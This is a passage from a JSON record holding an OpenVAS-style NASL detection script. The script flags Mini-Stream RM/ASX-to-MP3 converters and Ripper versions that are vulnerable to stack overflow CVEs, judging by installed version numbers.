value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1642\", \"CVE-2009-1641\", \"CVE-2009-1645\");\n script_bugtraq_id(34864);\n script_name(\"Mini-Stream Multiple Products Stack Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8629\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8630\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8633\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8632\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8631\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/50374\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/50375\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/50376\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_mini_stream_prdts_detect.nasl\");\n script_mandatory_keys(\"MiniStream/Products/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nrmMp3 = get_kb_item(\"MiniStream/RmToMp3/Conv/Ver\");\nif(rmMp3)\n{\n if(version_is_less_equal(version:rmMp3, test_version:\"3.0.0.7\"))\n {\n security_message(0);\n }\n}\n\nasxMp3 = get_kb_item(\"MiniStream/AsxToMp3/Conv/Ver\");\nif(asxMp3)\n{\n if(version_is_less_equal(version:asxMp3, test_version:\"3.0.0.7\"))\n {\n security_message(0);\n }\n}\n\nripper = get_kb_item(\"MiniStream/Ripper/Ver\");\nif(ripper)\n{\n #Ministream ripper 3.0.1.1 points to the version 3.0.1.5\n if(version_is_less_equal(version:ripper,test_version:\"3.0.1.5\"))\n {\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}